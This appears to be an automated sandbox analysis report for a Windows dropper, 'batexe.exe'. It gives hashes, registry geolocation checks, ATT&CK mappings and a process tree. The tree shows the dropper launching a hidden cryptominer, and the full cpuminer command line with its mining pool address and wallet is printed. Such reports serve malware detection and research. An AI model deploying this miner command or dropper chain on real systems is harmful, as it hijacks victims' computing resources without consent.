73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
301s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17/02/2024, 12:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3656	b2e.exe
3116	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4912-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4912 wrote to memory of 3656	4912	batexe.exe	85
PID 4912 wrote to memory of 3656	4912	batexe.exe	85
PID 4912 wrote to memory of 3656	4912	batexe.exe	85
PID 3656 wrote to memory of 1996	3656	b2e.exe	86
PID 3656 wrote to memory of 1996	3656	b2e.exe	86
PID 3656 wrote to memory of 1996	3656	b2e.exe	86
PID 1996 wrote to memory of 3116	1996	cmd.exe	89
PID 1996 wrote to memory of 3116	1996	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4912
- C:\Users\Admin\AppData\Local\Temp\2F97.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2F97.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2F97.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3B9D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2F97.tmp\b2e.exe

Filesize
3.6MB

MD5
40b316413e93e005700f58fada973343

SHA1
b8c5135202690892ab8c4ce57e41302f0527ceeb

SHA256
5972c60040f2f501b37e48b0636e92dcd43367455d181457b80834675edd0424

SHA512
803e63b39b630e99174ae02007330fef510d9bbbe05f64c187b3921e9df63e0db9740e48d68dff371ab8fac6b6c317b27fd01bd9c92b43a4a081015ee8812c9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2F97.tmp\b2e.exe

Filesize
2.0MB

MD5
ce0b96e29d8137e25a2bcb674aec4f21

SHA1
2f816b62e23f1a09b281225f83771d56f505c71f

SHA256
bb895556b3c29ab049634ffa6efcb9a560a97ba7bc955657c747bb6dec011477

SHA512
cd41edf2142da33456a465d9ca75a15bacfe5777c811ccf4637bc556ce0f6dd964cadf9af4d57130d8ccdfc0c852221ea965d4a9257799a4ab504550963a3ced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2F97.tmp\b2e.exe

Filesize
2.1MB

MD5
ea54e3221f4e3a059dfb484a01b3ef1b

SHA1
3745f3094722bff65f651f6ded1af20ca8dff798

SHA256
20a8cad89f9d80952d563a4fa19ae7fc71bd473a891f9779b0a6d73ce605c060

SHA512
113f1f2554314ae83e518f3e45d10bf6c9415b5a0e324b325b139be14cf71a05f94d1e2a0f793351383a0bb061fab1d2aae1b496766f44adf14596db41f88f28

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B9D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
663KB

MD5
237c4ee4f23065042766b44b50106c76

SHA1
def8cd52f96f50b9496fbab691bdccb5caa65b66

SHA256
8f821944d7413c564fb8862ff423da32580b427c04664e9605eb596d56dbd905

SHA512
e2cd1fbaebe05e1e319ba79f31fa62e1be931b4d298a0d7f50a7515118a722de02ec17c4260a19a5a5cc0780c41c6b7dad099b4ec019e61142af73d70eb95ba1

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
738KB

MD5
93231ef2d08db64676929f44836dc921

SHA1
a054727f63c5e90a79f99eed81007f43fcb6c6a1

SHA256
9f1c5d9c2ae4d5fa6f56972eca30e9eeb7b8e02279ae4a6fad2c9798c9771cba

SHA512
c61dec5c3317ec9b65938abf377f8c6b73e448e22ff1d54011402e42bb592109f78fc0253439af0e0d6a205b704adcee0e7a59d374de3b6058b8d770e63fb31d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
791KB

MD5
1d8e90d74845066720c8337b3b10d22b

SHA1
f8668b768e7dad8b832b49d59ce062f9b0bc3307

SHA256
fb985c3335c3b227fb3f911210d2c2a05a800dffec56e16f0334ecbc59001de4

SHA512
9081b3921792e81901b47bbcc9a7e7f2e6f8ba7fc1852baf832106a42ed5c8c9a7c55615e5950c4beeda9f064c1762dc2e21e54d6dc7ec2cebefd5b7cc11f063

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
551KB

MD5
87f80b425152feb5dd7769cb70507e9e

SHA1
4b19a0bbe1f5e49fed72d492887dff7b4825e372

SHA256
0abc28443614f16e7ca141be977708d490a4c42dd9de4936933d4b8e6160552a

SHA512
832728febb01a01a99bca3bc708b5bfd2b73320ebc72d13c0fda899317cc13ba33559753594c907373196532986f983ca28d0a54222fd8d533287dadcf26c441

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
335KB

MD5
d5681f8306dfde48f9fc665b32697eec

SHA1
289062bccf33986518d1d0c2bc541905ff951cb5

SHA256
38b0ab9cbe4cbe89be8853d1e68c4acd59d28fd192bebb0d46ac3c432592dd9a

SHA512
89e803135f6e9f8d0c3e6d617c3235f54302d3c37065dcb61e0a52be5374b8da579b708afc714b57a91fb3d6b8c18d7416b303660a8a948c58856fbc5fc150d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
825KB

MD5
6f2ad1d170beea072ce99411f4d9c025

SHA1
24ca867f2fce444402db590f9db718e0ee9be4df

SHA256
cb58d24d5807ee64a9956d9ea59d474b4fd3ea249670d8e0acb0ee88afc65323

SHA512
ef9e96cbb735c887fcee5604ccadeaa64608d1786808ec5018d8bdd0e7731871dee4f5234edc77769cb89b4bf72c05cc998980461bdd0d4ef1636f946a810963

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
534KB

MD5
56d69b9ebe0fb087cd21d5009b3940b1

SHA1
7ae2c9f75efe51e287477922ad02bc89e4519523

SHA256
04f1757fb138864d33a5c7d498624e4bfffa0ed0ffb294cc4c5a8132691511ba

SHA512
42631524620f3bf9bd21ace9a9d96f89f860baa092d128ec5a19a0a74d995ae6cd1742c0fcc7796cd3dcd10cbb702d6b8742720f2f91caae06c4bdbb509d7254

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
492KB

MD5
462f42a409ff69a37d54080f60a64f21

SHA1
9a96312161bb5265c3600f6c7a5228b7b6f3a462

SHA256
99bf8a3a56e9becf5f2faaf0c75fbbc0b8c90568ada33aa79d9a9df6c63de44a

SHA512
2953f94da5540e45aa4bd8ad16fadef2589c5bda7e2df8f7c2565e047b2746b7d11671d7018b1dd8dd5480b6c75339953b6c0d37b99d9bfe1973c286dafdc637

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
510KB

MD5
12a3df4fabe24f47976b54a50d47ccd5

SHA1
f76dd31cd5af530a73b37ca49426c1a72ad9668f

SHA256
b9bad3b57087013f7c393c73493f2809856384693c257e29925fa05e0b059bee

SHA512
357304892c7abae0cef3a55c4a11609eb847976a93ccce405ea42c329399f6c8d9a85823988d6f4d4406872e8205aaf34322dc64d23b37dc0a38e15fb008dfd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
622KB

MD5
46ce65efea2119d796c39fe3eacbb3c1

SHA1
ad7045ac0f616db862cdf682ab47eeb68c313fe2

SHA256
ac4f78ca8fc89191181de5524e93a30039fe747d01746ae8085f5fa3abf75b94

SHA512
ade040f1df934b87d76f22c967c3656c8022650f946f2ac97cabef6faef68a08c03681ca019f34919af6b89ce433fef5e64e62035343817f7564bf5f6aaac4c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
394KB

MD5
15241a47cbdafbbc04e1b3944000308c

SHA1
009d802ec017d87bc6aa3216e81ad40afa3492c6

SHA256
85f6df7eda52574189f7af608b3d4c096abba7ccd8e5390d4de9a5a0a163318d

SHA512
13e0cefe00ecb2913116b7a2247f497df57e8020ebba677f98b62800216e69341a95cef4cd90f399e8449a96b2c5c876008050e0f7ff317f8df8ebdbc4648ca0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
403KB

MD5
b26986b64029b2aa1a37169a08a68286

SHA1
2d5090168f27e6152c0e5abfe8bbb02b47df4ae9

SHA256
a7b6f40ff086932b617bbf0ace011b2f6f5aced19801bfd1b339476796b821a6

SHA512
fc34ea7b9089535373da4de4672d69572817041f3b987953c77d009392578e755318c4c805ae15425392a1bf637de3880f3b610dc96d9e9510a58fc776d55994

Download Submit
memory/3116-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3116-49-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/3116-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/3116-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/3116-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/3116-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3656-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3656-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4912-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download